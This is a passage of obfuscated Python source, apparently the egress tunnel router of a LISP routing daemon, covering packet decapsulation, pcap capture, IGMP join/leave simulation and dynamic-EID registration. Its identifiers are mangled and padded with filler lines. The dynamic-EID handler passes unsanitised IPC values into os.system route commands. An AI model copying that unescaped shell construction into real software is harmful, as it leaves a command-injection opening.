return
if 85 - 85: iIii1I11I1II1
if 92 - 92: iiiiIi11i / II11iiII . oOoO0oo0OOOo
if 30 - 30: o0000oOoOoO0o . oOoO0oo0OOOo / II11iiII
if 2 - 2: oooO0oo0oOOOO % oo - o0oo0o
if 79 - 79: OoooooooOO / oOoO0oo0OOOo . O0
if ( packet . inner_dest . is_multicast_address ( ) == False ) :
ooo0O = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( ooo0O ) :
ooo0O . increment_decap_stats ( packet )
else :
lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
if 79 - 79: iiiiIi11i - II111iiii
return
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , ed = "decap" ) == False ) : return
if 12 - 12: i1IIi / II11iiII % Oo * oooO0oo0oOOOO * O0 * iIii1I11I1II1
if 93 - 93: OoO0O00 / oOoO0oo0OOOo + i1IIi * iiiiIi11i . OoooooooOO
if 54 - 54: O0 / oooO0oo0oOOOO % Oo * i1IIi * O0
if 48 - 48: Ooo00oOo00o . iiiiIi11i % oOo0O0Ooo - oOo0O0Ooo
if 33 - 33: OoOO0ooOOoo0O % II111iiii + ooOO00oOo
i111IiI1I = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
packet . inner_dest . print_address ( ) )
if 93 - 93: i1IIi . oooO0oo0oOOOO / oo + oooO0oo0oOOOO
lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( I1i1II1 , lisp . green ( i111IiI1I , False ) ,
lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
if 59 - 59: ooOO00oOo - ooOO00oOo + i1I1ii1II1iII
if 32 - 32: i1IIi / OoO0O00 - O0
if 85 - 85: o0000oOoOoO0o - O0 * i11iIiiIii . i1IIi
if 20 - 20: i1I1ii1II1iII / II11iiII
if 28 - 28: Oo * OoOO0ooOOoo0O % i11iIiiIii * i1I1ii1II1iII / o0000oOoOoO0o
if ( i11I1IIiiii ) :
packet . bridge_l2_packet ( packet . inner_dest , ooo0O )
return
if ( packet . inner_version == 6 ) :
packet . send_l2_packet ( oO0o0o0ooO0oO , oo0o0O00 )
return
if 34 - 34: iiiiIi11i - Oo * OoO0O00 / Ooo00oOo00o
if 19 - 19: oOoO0oo0OOOo
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - oOo0O0Ooo % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: ooOO00oOo * OoooooooOO
Ii11iiI = packet . get_raw_socket ( )
if ( Ii11iiI == None ) : Ii11iiI = oOo0oooo00o
if 71 - 71: o0oo0o - Ooo00oOo00o - II11iiII
if 28 - 28: iIii1I11I1II1
if 7 - 7: Ooo00oOo00o % oooO0oo0oOOOO * oOo0O0Ooo
if 58 - 58: oooO0oo0oOOOO / OoOO0ooOOoo0O + II111iiii % i1I1ii1II1iII - OoooooooOO
packet . send_packet ( Ii11iiI , packet . inner_dest )
return
def oOoO ( lisp_raw_socket , packet , source ) :
global I11 , Oo0o0000o0o0
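# Presumed handler for LISP-encapsulated packets arriving on the ephemeral
# NAT-traversal socket: strip the UDP header, decode the LISP header,
# special-case LISP-Decent instance-id 0xffffff (control messages and
# RLOC-probes carried inside data encapsulation), update decap stats, and
# forward the inner packet the same way as the pcap path above.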
if 32 - 32: O0 + iiiiIi11i % OoO0O00
if 7 - 7: oOoO0oo0OOOo / Oo
if 11 - 11: oooO0oo0oOOOO * Oo / Oo - II11iiII
if 68 - 68: oo % oooO0oo0oOOOO - oooO0oo0oOOOO / oo + oOoO0oo0OOOo - OoO0O00
o0oO0o00O = packet
packet = lisp . lisp_packet ( packet [ 8 : : ] )
if ( packet . lisp_header . decode ( o0oO0o00O ) == False ) : return
if 6 - 6: OoooooooOO / i11iIiiIii / o0oo0o
if 60 - 60: oo % iiiiIi11i / Ooo00oOo00o % iiiiIi11i * i11iIiiIii / i1I1ii1II1iII
if 34 - 34: o0oo0o - II11iiII
if 25 - 25: iiiiIi11i % oo + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
packet . outer_source = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , source ,
lisp . LISP_IPV4_HOST_MASK_LEN , 0 )
if 10 - 10: o0oo0o % O0 / oo % OoOO0ooOOoo0O
oO0OOOO0o0 = packet . decode ( False , I11 ,
lisp . lisp_decap_stats )
if ( oO0OOOO0o0 == None ) : return
if ( lisp . lisp_flow_logging ) : packet . log_flow ( False )
if 65 - 65: i11iIiiIii + OoO0O00 * OoooooooOO - ooOO00oOo
packet . print_packet ( "Kernel-decap" , False )
lisp . dprint ( packet . lisp_header . print_header ( " " ) )
if ( lisp . lisp_decent_push_configured and
packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
if 95 - 95: OoooooooOO % OoooooooOO . o0000oOoOoO0o
II1iI = packet . udp_sport
packet = packet . packet [ 28 : : ]
packet = lisp . lisp_packet_ipc ( packet , source , II1iI )
lisp . lisp_ipc ( packet , I11 , "lisp-ms" )
return
if ( packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
packet = packet . packet
OOooO0Oo00 = - 1
if ( lisp . lisp_is_rloc_probe_request ( packet [ 28 ] ) ) :
OOooO0Oo00 = struct . unpack ( "B" , packet [ 8 ] ) [ 0 ] - 1
if 37 - 37: i1I1ii1II1iII
packet = packet [ 28 : : ]
lisp . lisp_parse_packet ( Oo0o0000o0o0 , packet , source , 0 , OOooO0Oo00 )
return
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 65 - 65: i1I1ii1II1iII * iIii1I11I1II1 / O0 . OoOO0ooOOoo0O
if 94 - 94: OoO0O00 . Oo * i11iIiiIii - Ooo00oOo00o . i1I1ii1II1iII
if 98 - 98: II11iiII + o0000oOoOoO0o
if 52 - 52: OoO0O00 / oOo0O0Ooo - o0oo0o . i1I1ii1II1iII
if 50 - 50: iIii1I11I1II1 - i1I1ii1II1iII - OoOO0ooOOoo0O
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
if 60 - 60: iIii1I11I1II1 * Oo
if 71 - 71: oOo0O0Ooo % OoO0O00 % Oo
if 34 - 34: OoOO0ooOOoo0O / OoOO0ooOOoo0O % oooO0oo0oOOOO . oOo0O0Ooo / OoO0O00
if 99 - 99: Oo * oo - Oo % o0000oOoOoO0o
if ( packet . inner_dest . is_multicast_address ( ) == False ) :
ooo0O = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( ooo0O ) :
ooo0O . increment_decap_stats ( packet )
else :
lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , ed = "decap" ) == False ) : return
if 91 - 91: i1I1ii1II1iII / oOoO0oo0OOOo . i1I1ii1II1iII - Ooo00oOo00o + oOoO0oo0OOOo
if 72 - 72: o0000oOoOoO0o . oooO0oo0oOOOO * oOoO0oo0OOOo / oOoO0oo0OOOo / i1I1ii1II1iII
i111IiI1I = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
packet . inner_dest . print_address ( ) )
if 13 - 13: i1IIi
lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( lisp . bold ( "NAT-Forward" , False ) , lisp . green ( i111IiI1I , False ) ,
lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
if 86 - 86: Oo
if 51 - 51: ooOO00oOo - i11iIiiIii * oo
if 95 - 95: II11iiII % oOoO0oo0OOOo + Ooo00oOo00o % Oo
if 36 - 36: O0 / i1IIi % II111iiii / i1I1ii1II1iII
if 96 - 96: OoO0O00 / iiiiIi11i . II111iiii . OoO0O00
if ( packet . inner_version == 6 ) :
packet . send_l2_packet ( oO0o0o0ooO0oO , oo0o0O00 )
return
if 91 - 91: II111iiii . II11iiII + Ooo00oOo00o
if 8 - 8: II11iiII * OoO0O00 / i1I1ii1II1iII - ooOO00oOo - OoooooooOO
if 100 - 100: iiiiIi11i . iIii1I11I1II1 . iIii1I11I1II1
if 55 - 55: iiiiIi11i
if 37 - 37: oooO0oo0oOOOO / i11iIiiIii / OoO0O00
Ii11iiI = packet . get_raw_socket ( )
if ( Ii11iiI == None ) : Ii11iiI = lisp_raw_socket
if 97 - 97: o0oo0o . OoOO0ooOOoo0O / oo
if 83 - 83: OoOO0ooOOoo0O - oOoO0oo0OOOo * iiiiIi11i
if 90 - 90: OoO0O00 * oo
if 75 - 75: oOoO0oo0OOOo - oOo0O0Ooo * i11iIiiIii . OoooooooOO - OoO0O00 . OoOO0ooOOoo0O
packet . send_packet ( Ii11iiI , packet . inner_dest )
return
def iiI1iiii1Iii ( group , joinleave ) :
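# Join/leave for an internally learned group: find the longest-match
# group-mapping for 'group' and hand one [source, group, join/leave] entry
# per configured source to the multicast Map-Register builder.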
O00ooOo = None
for I1111IIi in lisp . lisp_group_mapping_list . values ( ) :
ii1 = oO00oOo0OOO ( group , I1111IIi )
if ( ii1 == - 1 ) : continue
if ( O00ooOo == None or ii1 > O00ooOo . group_prefix . mask_len ) : O00ooOo = I1111IIi
if 94 - 94: i11iIiiIii % iiiiIi11i + OoO0O00 + iiiiIi11i
if ( O00ooOo == None ) : return
if 33 - 33: oooO0oo0oOOOO . OoO0O00 / iIii1I11I1II1
iiiIiIiI = [ ]
for IIiIi1iI in O00ooOo . sources :
iiiIiIiI . append ( [ IIiIi1iI , group , joinleave ] )
if 30 - 30: i1I1ii1II1iII / ooOO00oOo . i1I1ii1II1iII
if 17 - 17: OoO0O00 + OoooooooOO * OoooooooOO
Ii11iI ( Oo0o0000o0o0 , iiiIiIiI )
return
def o0000O00oO0O ( ) :
global Oo0o0000o0o0
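# Test/compatibility polling thread: every 10 seconds it scans the current
# directory for "join-<group>" / "leave-<group>" files. IPv6 groups are
# registered directly; for IPv4 groups it fabricates a minimal IGMPv2
# report or leave (the hard-coded words below look like an IPv4 header
# template with router-alert) and feeds it to the IGMP handler.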
if 3 - 3: iIii1I11I1II1 % oOoO0oo0OOOo . II11iiII % OoOO0ooOOoo0O
lisp . lisp_set_exception ( )
if 40 - 40: Oo * o0000oOoOoO0o . o0000oOoOoO0o + II111iiii + OoooooooOO
i11I1Iii1I = socket . htonl
iii1 = [ i11I1Iii1I ( 0x46000020 ) , i11I1Iii1I ( 0x9fe60000 ) , i11I1Iii1I ( 0x0102d7cc ) ,
i11I1Iii1I ( 0x0acfc15a ) , i11I1Iii1I ( 0xe00000fb ) , i11I1Iii1I ( 0x94040000 ) ]
if 93 - 93: iiiiIi11i % i1IIi
oOO0 = ""
for OO in iii1 : oOO0 += struct . pack ( "I" , OO )
if 61 - 61: OoOO0ooOOoo0O . OoOO0ooOOoo0O - ooOO00oOo
if 62 - 62: i1I1ii1II1iII . i1I1ii1II1iII
if 22 - 22: Oo / Oo - o0000oOoOoO0o % OoOO0ooOOoo0O . II11iiII + oooO0oo0oOOOO
if 64 - 64: i1IIi % oOoO0oo0OOOo / o0000oOoOoO0o % OoooooooOO
if 24 - 24: o0oo0o + OoooooooOO . oooO0oo0oOOOO / oOo0O0Ooo / OoOO0ooOOoo0O
while ( True ) :
ooOoo = commands . getoutput ( "ls join-*" ) . replace ( "join-" , "" )
ooOoo = ooOoo . split ( "\n" )
if 91 - 91: Ooo00oOo00o . i1I1ii1II1iII % OoO0O00 - i1I1ii1II1iII . iiiiIi11i % i11iIiiIii
for ooO in ooOoo :
if ( lisp . lisp_valid_address_format ( "address" , ooO ) == False ) :
continue
if 25 - 25: iIii1I11I1II1
if 63 - 63: Oo
oO0oOOOooo = ( ooO . find ( ":" ) != - 1 )
if 6 - 6: iIii1I11I1II1 - iIii1I11I1II1 % Ooo00oOo00o / iIii1I11I1II1 * o0oo0o
if 3 - 3: II11iiII . oooO0oo0oOOOO / OoO0O00
if 89 - 89: OoooooooOO . iIii1I11I1II1 . OoO0O00 * iIii1I11I1II1 - o0oo0o
if 92 - 92: OoooooooOO - oOoO0oo0OOOo - OoooooooOO % oo % oo % iIii1I11I1II1
O00oo0oOoO00O = os . path . exists ( "leave-{}" . format ( ooO ) )
lisp . lprint ( "Internal {} group {}" . format ( "leaving" if O00oo0oOoO00O else "joining" , ooO ) )
if 7 - 7: II111iiii * Oo . OoO0O00 / oo
if 43 - 43: o0000oOoOoO0o + i1I1ii1II1iII + i1IIi - oOo0O0Ooo + Ooo00oOo00o
if 54 - 54: oOoO0oo0OOOo + oOoO0oo0OOOo + OoOO0ooOOoo0O % i1IIi % i11iIiiIii
if 100 - 100: oOoO0oo0OOOo
if 96 - 96: oo . oooO0oo0oOOOO * II111iiii % oooO0oo0oOOOO . o0oo0o * i1IIi
if ( oO0oOOOooo ) :
if ( ooO . lower ( ) . find ( "ff02:" ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
continue
if 83 - 83: iIii1I11I1II1
iiI1iiii1Iii ( ooO , ( O00oo0oOoO00O == False ) )
else :
Oo0O0O = oOO0
if ( O00oo0oOoO00O ) :
Oo0O0O += struct . pack ( "I" , i11I1Iii1I ( 0x17000000 ) )
else :
Oo0O0O += struct . pack ( "I" , i11I1Iii1I ( 0x16000000 ) )
if 8 - 8: i11iIiiIii * O0 + oOoO0oo0OOOo . iIii1I11I1II1 % OoOO0ooOOoo0O / OoOO0ooOOoo0O
if 70 - 70: oo + o0000oOoOoO0o
o0o = ooO . split ( "." )
oO0o0Ooooo = int ( o0o [ 0 ] ) << 24
oO0o0Ooooo += int ( o0o [ 1 ] ) << 16
oO0o0Ooooo += int ( o0o [ 2 ] ) << 8
oO0o0Ooooo += int ( o0o [ 3 ] )
Oo0O0O += struct . pack ( "I" , i11I1Iii1I ( oO0o0Ooooo ) )
i1I1i1i ( Oo0O0O )
time . sleep ( .100 )
if 76 - 76: i1I1ii1II1iII . oooO0oo0oOOOO % i1I1ii1II1iII - o0oo0o
if 51 - 51: OoooooooOO + Ooo00oOo00o * iIii1I11I1II1 * iiiiIi11i / i1IIi
time . sleep ( 10 )
if 19 - 19: i1I1ii1II1iII - oOo0O0Ooo % iiiiIi11i / OoooooooOO % i1I1ii1II1iII
return
def oo0O00ooo0o ( ) :
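# Packet-capture thread: opens a pcappy live capture on "any" and installs a
# BPF filter matching IGMP (proto 2) plus, for any local RLOC or multicast
# RLE address, LISP/VXLAN data ports (4341, 8472, 4789), RLOC-probe
# Map-Requests on 4342, and fragmented UDP, then loops handing each packet
# to the callback above.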
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 29 - 29: OoooooooOO . II111iiii % oOo0O0Ooo
if 26 - 26: iIii1I11I1II1 - oOoO0oo0OOOo . oooO0oo0oOOOO . oooO0oo0oOOOO + iIii1I11I1II1 * OoO0O00
if 85 - 85: II11iiII + II111iiii - II11iiII * iiiiIi11i - i1IIi % i1I1ii1II1iII
if 1 - 1: OoooooooOO / O0 + oOo0O0Ooo + oOo0O0Ooo . o0oo0o - oOo0O0Ooo
if 9 - 9: o0oo0o * OoooooooOO % oo / oOo0O0Ooo * OoOO0ooOOoo0O
ii = lisp . lisp_get_all_multicast_rles ( )
if 47 - 47: i11iIiiIii / OoO0O00 - OoO0O00 * ooOO00oOo
if 48 - 48: oooO0oo0oOOOO
if 96 - 96: iiiiIi11i / O0 . II111iiii + oooO0oo0oOOOO % Ooo00oOo00o
if 67 - 67: O0 % o0oo0o
IIii1III = "any"
if 35 - 35: oo . oOo0O0Ooo + OoooooooOO % OoO0O00 % II11iiII
if 39 - 39: o0000oOoOoO0o
if 60 - 60: II11iiII
o000ooOo0o0OO = pcappy . open_live ( IIii1III , 1600 , 0 , 100 )
if 1 - 1: iIii1I11I1II1 % Oo + O0
IIiII11 = "(proto 2) or "
if 58 - 58: i1I1ii1II1iII
IIiII11 += "((dst host "
for I11IIIII in lisp . lisp_get_all_addresses ( ) + ii :
IIiII11 += "{} or " . format ( I11IIIII )
if 53 - 53: OoooooooOO . OoooooooOO + Ooo00oOo00o - i1I1ii1II1iII + II11iiII
IIiII11 = IIiII11 [ 0 : - 4 ]
IIiII11 += ") and ((udp dst port 4341 or 8472 or 4789) or "
IIiII11 += "(udp dst port 4342 and ip[28] == 0x12) or "
IIiII11 += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0)))))"
if 44 - 44: o0oo0o - oooO0oo0oOOOO
if 100 - 100: iiiiIi11i . ooOO00oOo - o0000oOoOoO0o + O0 * ooOO00oOo
lisp . lprint ( "Capturing packets for: '{}' on device {}" . format ( IIiII11 ,
IIii1III ) )
o000ooOo0o0OO . filter = IIiII11
if 59 - 59: II111iiii
if 43 - 43: OoO0O00 + OoooooooOO
if 47 - 47: Oo
if 92 - 92: OoOO0ooOOoo0O % i11iIiiIii % OoO0O00
o000ooOo0o0OO . loop ( - 1 , i11IiI1iiI11 , [ IIii1III , oOo0oooo00o ] )
return
def Ii1iIi ( ) :
global I11
global i1111
global Oo0o0000o0o0
global oOo0oooo00o
global oO0o0o0ooO0oO
global oo0o0O00
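# ETR start-up: discover local interfaces, MACs and addresses; open the
# data/control listen socket and the "lisp-etr" IPC socket; create a raw
# IPv4 socket (IP_HDRINCL) used to forward decapsulated packets; create the
# "lispers.net" tun device for IPv6 EIDs when pytun is available; and start
# the packet-capture and join-file polling threads.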
if 79 - 79: II11iiII % o0oo0o / iiiiIi11i - iIii1I11I1II1 - oOo0O0Ooo
lisp . lisp_i_am ( "etr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ETR starting up" )
if 60 - 60: II111iiii
if 90 - 90: oOo0O0Ooo
if 37 - 37: oOo0O0Ooo + O0 . O0 * OoO0O00 % o0oo0o / i1I1ii1II1iII
if 18 - 18: OoooooooOO
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
IIiIi1iI = lisp . lisp_open_listen_socket ( "0.0.0.0" , str ( i11 ) )
IIiIi1iI . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_TTL , 32 )
i1111 = IIiIi1iI
if 92 - 92: iiiiIi11i
if 7 - 7: i1I1ii1II1iII
if 73 - 73: ooOO00oOo % oOoO0oo0OOOo
if 32 - 32: II11iiII + i1I1ii1II1iII + iIii1I11I1II1 * OoO0O00
I11 = lisp . lisp_open_listen_socket ( "" , "lisp-etr" )
if 62 - 62: i11iIiiIii
Oo0o0000o0o0 [ 0 ] = i1111
Oo0o0000o0o0 [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
Oo0o0000o0o0 [ 2 ] = I11
oOo0oooo00o = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
oOo0oooo00o . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
Oo0o0000o0o0 . append ( oOo0oooo00o )
if ( pytun != None ) :
oo0o0O00 = '\x00\x00\x86\xdd'
IIii1III = "lispers.net"
try :
oO0o0o0ooO0oO = pytun . TunTapDevice ( flags = pytun . IFF_TUN ,
name = IIii1III )
os . system ( "ip link set dev {} up" . format ( IIii1III ) )
except :
lisp . lprint ( "Cannot create tuntap interface" )
if 57 - 57: oOoO0oo0OOOo / OoooooooOO % oOoO0oo0OOOo . O0 / oOoO0oo0OOOo
if 63 - 63: oooO0oo0oOOOO + iIii1I11I1II1 + oo + o0oo0o
if 72 - 72: ooOO00oOo + i11iIiiIii + oOoO0oo0OOOo
if 96 - 96: iiiiIi11i % i1IIi / Ooo00oOo00o
if 13 - 13: II111iiii - OoO0O00 % i11iIiiIii + i1I1ii1II1iII
if 88 - 88: O0 . iiiiIi11i % oo
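# Two background worker threads are started below; their obfuscated targets
# are presumably the ETR's packet-capture / decapsulation loops.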
threading . Thread ( target = oo0O00ooo0o , args = [ ] ) . start ( )
if 10 - 10: oo + O0
if 75 - 75: O0 % iIii1I11I1II1 / oOo0O0Ooo % II11iiII / oooO0oo0oOOOO
if 31 - 31: i11iIiiIii * oOo0O0Ooo
if 69 - 69: i11iIiiIii
threading . Thread ( target = o0000O00oO0O , args = [ ] ) . start ( )
return ( True )
if 61 - 61: O0
if 21 - 21: ooOO00oOo % iIii1I11I1II1 . ooOO00oOo
if 99 - 99: Ooo00oOo00o * II11iiII % iiiiIi11i * iiiiIi11i + OoooooooOO
if 82 - 82: OoOO0ooOOoo0O / oOo0O0Ooo - II11iiII / Oo
if 50 - 50: II11iiII + ooOO00oOo . i11iIiiIii + oOoO0oo0OOOo + i11iIiiIii
if 31 - 31: iiiiIi11i * o0oo0o . oOo0O0Ooo * OoOO0ooOOoo0O
if 28 - 28: oooO0oo0oOOOO + oo - OoO0O00 % II11iiII . OoOO0ooOOoo0O + oo
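# Shutdown helper: cancels the two periodic timers if they are armed and
# closes the ETR's control sockets before exit.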
def O0oO0 ( ) :
global o0oOoO00o
global oOOoo00O0O
if 65 - 65: II11iiII + o0oo0o - o0000oOoOoO0o
if 53 - 53: oo
if 96 - 96: ooOO00oOo - oooO0oo0oOOOO . OoooooooOO
if 10 - 10: o0oo0o
if ( o0oOoO00o ) : o0oOoO00o . cancel ( )
if ( oOOoo00O0O ) : oOOoo00O0O . cancel ( )
if 48 - 48: i1I1ii1II1iII * i1IIi % OoooooooOO * o0000oOoOoO0o * ooOO00oOo
if 7 - 7: i1I1ii1II1iII . o0000oOoOoO0o . i1I1ii1II1iII - o0oo0o
if 33 - 33: Oo + OoooooooOO - ooOO00oOo / i1IIi / OoooooooOO
if 82 - 82: oOoO0oo0OOOo / II11iiII - i1I1ii1II1iII / OoO0O00 * ooOO00oOo
lisp . lisp_close_socket ( Oo0o0000o0o0 [ 0 ] , "" )
lisp . lisp_close_socket ( Oo0o0000o0o0 [ 1 ] , "" )
lisp . lisp_close_socket ( I11 , "lisp-etr" )
return
if 55 - 55: OoooooooOO
if 73 - 73: oOo0O0Ooo - oOoO0oo0OOOo % OoO0O00 + oOoO0oo0OOOo - O0 . ooOO00oOo
if 38 - 38: O0
if 79 - 79: i1IIi . iiiiIi11i
if 34 - 34: o0oo0o * II111iiii
if 71 - 71: oooO0oo0oOOOO
if 97 - 97: oOoO0oo0OOOo
if 86 - 86: OoO0O00 - II11iiII . oOo0O0Ooo . II111iiii * oo . II111iiii
if 34 - 34: Ooo00oOo00o . o0oo0o % oooO0oo0oOOOO - O0 / o0oo0o
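# IPC handler for "learn%" messages from the ITR: parses
# "learn%<eid>%<interface>", then registers or deregisters the dynamic-EID in
# the matching database-mapping and adds or removes a host route for it
# (the route change is skipped on macOS).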
def Oo00OOoO0oo ( ipc ) :
ipc = ipc . split ( "%" )
iiIiI1ii = ipc [ 1 ]
IIi11ii11 = ipc [ 2 ]
if ( IIi11ii11 == "None" ) : IIi11ii11 = None
if 54 - 54: OoOO0ooOOoo0O % O0 - II11iiII % ooOO00oOo + ooOO00oOo . oooO0oo0oOOOO
iII1iii = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
iII1iii . store_address ( iiIiI1ii )
if 99 - 99: ooOO00oOo / i1IIi . oOoO0oo0OOOo
if 23 - 23: o0000oOoOoO0o * Oo - OoOO0ooOOoo0O . O0 % iIii1I11I1II1
if 19 - 19: oo
if 66 - 66: iiiiIi11i / oOo0O0Ooo
ooo0O = lisp . lisp_db_for_lookups . lookup_cache ( iII1iii , False )
if ( ooo0O == None or ooo0O . dynamic_eid_configured ( ) == False ) :
lisp . lprint ( "ITR/ETR dynamic-EID configuration out of sync for {}" . format ( lisp . green ( iiIiI1ii , False ) ) )
if 13 - 13: II111iiii
return
if 55 - 55: OoO0O00 % i1IIi * OoOO0ooOOoo0O
if 95 - 95: II11iiII / II111iiii - Ooo00oOo00o % o0oo0o . OoOO0ooOOoo0O
if 63 - 63: iIii1I11I1II1 / Oo
if 24 - 24: OoO0O00 / iIii1I11I1II1 % II11iiII * oOo0O0Ooo - iIii1I11I1II1
if 50 - 50: II111iiii
if 39 - 39: II111iiii . oOo0O0Ooo - OoO0O00 * i1IIi . OoooooooOO
oOooO0 = None
if ( iiIiI1ii in ooo0O . dynamic_eids ) : oOooO0 = ooo0O . dynamic_eids [ iiIiI1ii ]
if 44 - 44: oo
if ( oOooO0 == None and IIi11ii11 == None ) :
lisp . lprint ( "ITR/ETR state mismatch for {}" . format ( lisp . green ( iiIiI1ii , False ) ) )
if 55 - 55: iiiiIi11i . o0oo0o * o0oo0o
return
if 82 - 82: oo % ooOO00oOo % OoOO0ooOOoo0O + OoOO0ooOOoo0O
if 6 - 6: OoO0O00
if 73 - 73: o0oo0o * oOoO0oo0OOOo + Ooo00oOo00o - OoO0O00 . OoOO0ooOOoo0O
if 93 - 93: i11iIiiIii
if 80 - 80: i1IIi . oo - iiiiIi11i + II11iiII + i1I1ii1II1iII % iiiiIi11i
if 13 - 13: II111iiii / oOo0O0Ooo / oOo0O0Ooo + Oo
if 49 - 49: O0 / II111iiii * oo - OoooooooOO . II111iiii % oooO0oo0oOOOO
if ( oOooO0 and IIi11ii11 ) :
if ( oOooO0 . interface == IIi11ii11 ) :
lisp . lprint ( "ITR sent redundant IPC for {}" . format ( lisp . green ( iiIiI1ii , False ) ) )
if 13 - 13: iiiiIi11i . iIii1I11I1II1 . II11iiII . oooO0oo0oOOOO
else :
lisp . lprint ( "Dynamic-EID {} interface change, {} -> {}" . format ( lisp . green ( iiIiI1ii , False ) , oOooO0 . interface , IIi11ii11 ) )
if 58 - 58: OoOO0ooOOoo0O
oOooO0 . interface = IIi11ii11
if 7 - 7: II111iiii / oooO0oo0oOOOO % OoOO0ooOOoo0O + oo - O0
return
if 45 - 45: oo / i1I1ii1II1iII + iiiiIi11i + oooO0oo0oOOOO
if 15 - 15: oo % ooOO00oOo
if 66 - 66: iiiiIi11i * i11iIiiIii . o0oo0o
if 92 - 92: iiiiIi11i
if 81 - 81: Ooo00oOo00o % oo - i1I1ii1II1iII / i11iIiiIii
if ( IIi11ii11 ) :
oOooO0 = lisp . lisp_dynamic_eid ( )
oOooO0 . dynamic_eid . copy_address ( iII1iii )
oOooO0 . interface = IIi11ii11
oOooO0 . get_timeout ( IIi11ii11 )
ooo0O . dynamic_eids [ iiIiI1ii ] = oOooO0
if 73 - 73: O0 * o0oo0o . i1IIi
OO00OoOO = lisp . bold ( "Registering" , False )
iiIiI1ii = lisp . bold ( iiIiI1ii , False )
lisp . lprint ( "{} dynamic-EID {} on interface {}, timeout {}" . format ( OO00OoOO ,
lisp . green ( iiIiI1ii , False ) , IIi11ii11 , oOooO0 . timeout ) )
if 45 - 45: II111iiii * i1IIi
o00oo0 ( Oo0o0000o0o0 , None , iII1iii , None , False )
if 25 - 25: oOo0O0Ooo + iIii1I11I1II1 % OoOO0ooOOoo0O / OoO0O00 * OoO0O00
if 51 - 51: iiiiIi11i - ooOO00oOo + i1I1ii1II1iII - Ooo00oOo00o . ooOO00oOo % oOoO0oo0OOOo
if 14 - 14: oo / O0
if 43 - 43: iiiiIi11i - oooO0oo0oOOOO % i11iIiiIii * II111iiii . o0oo0o - OoOO0ooOOoo0O
if ( lisp . lisp_is_macos ( ) == False ) :
iiIiI1ii = iII1iii . print_prefix_no_iid ( )
i11i111 = "ip route add {} dev {}" . format ( iiIiI1ii , IIi11ii11 )
os . system ( i11i111 )
if 36 - 36: OoOO0ooOOoo0O - oooO0oo0oOOOO . oooO0oo0oOOOO
return
if 60 - 60: i11iIiiIii * OoO0O00 % ooOO00oOo + ooOO00oOo
if 84 - 84: iIii1I11I1II1 + OoooooooOO
if 77 - 77: O0 * oOoO0oo0OOOo * iiiiIi11i + ooOO00oOo + oOoO0oo0OOOo - o0oo0o
if 10 - 10: oOoO0oo0OOOo + oooO0oo0oOOOO
if 58 - 58: oo + OoooooooOO / i1I1ii1II1iII . Oo % Ooo00oOo00o / oOoO0oo0OOOo
if ( iiIiI1ii in ooo0O . dynamic_eids ) :
IIi11ii11 = ooo0O . dynamic_eids [ iiIiI1ii ] . interface
oooO0 = lisp . bold ( "Deregistering" , False )
lisp . lprint ( "{} dynamic-EID {}" . format ( oooO0 ,
lisp . green ( iiIiI1ii , False ) ) )
if 29 - 29: o0000oOoOoO0o * II11iiII * i1IIi . o0000oOoOoO0o * o0oo0o . Oo
o00oo0 ( Oo0o0000o0o0 , 0 , iII1iii , None , False )
if 54 - 54: i1I1ii1II1iII . i1IIi . oOoO0oo0OOOo * Ooo00oOo00o % i1I1ii1II1iII
ooo0O . dynamic_eids . pop ( iiIiI1ii )
if 30 - 30: OoOO0ooOOoo0O
if 85 - 85: II111iiii + Oo * OoOO0ooOOoo0O
if 12 - 12: o0000oOoOoO0o . oo % Ooo00oOo00o
if 28 - 28: o0000oOoOoO0o - oo % ooOO00oOo * o0oo0o
if ( lisp . lisp_is_macos ( ) == False ) :
iiIiI1ii = iII1iii . print_prefix_no_iid ( )
i11i111 = "ip route delete {} dev {}" . format ( iiIiI1ii , IIi11ii11 )
os . system ( i11i111 )
if 80 - 80: II11iiII * oooO0oo0oOOOO
if 4 - 4: iIii1I11I1II1 . o0oo0o + II111iiii % OoooooooOO
return
if 82 - 82: OoooooooOO / Oo * OoOO0ooOOoo0O * O0 . oOoO0oo0OOOo
if 21 - 21: II111iiii + OoO0O00
if 59 - 59: II11iiII + oo / II111iiii / oOo0O0Ooo
if 80 - 80: oOo0O0Ooo + iIii1I11I1II1 . oooO0oo0oOOOO
if 76 - 76: oo * II11iiII
if 12 - 12: iIii1I11I1II1 / OoOO0ooOOoo0O % o0000oOoOoO0o
